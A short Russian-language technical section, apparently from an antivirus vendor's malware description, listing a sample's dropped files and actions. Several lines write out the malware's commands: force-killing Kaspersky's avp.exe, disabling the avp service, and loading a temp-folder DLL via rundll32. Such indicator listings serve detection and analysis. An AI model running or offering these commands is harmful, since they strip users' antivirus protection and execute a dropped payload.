Техническая информация
- 'C:\service.exe'
- 'C:\services.exe'
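- '<SYSTEM32>\taskkill.exe' /f /t /im avp.exe (принудительно завершает процесс avp.exe — процесс антивируса Касперского — вместе с дочерними процессами)
- '<SYSTEM32>\sc.exe' config avp start= disabled (переводит службу avp в состояние «отключена», чтобы она не запускалась после перезагрузки)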
- '<SYSTEM32>\rundll32.exe' %TEMP%\194125.dll testall (загружает DLL из временного каталога и вызывает её экспортируемую функцию testall)
- %TEMP%\194125.dll
- %WINDIR%\Fonts\pci.sys
- C:\services.exe
- C:\service.exe
- %WINDIR%\Fonts\pci.sys
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''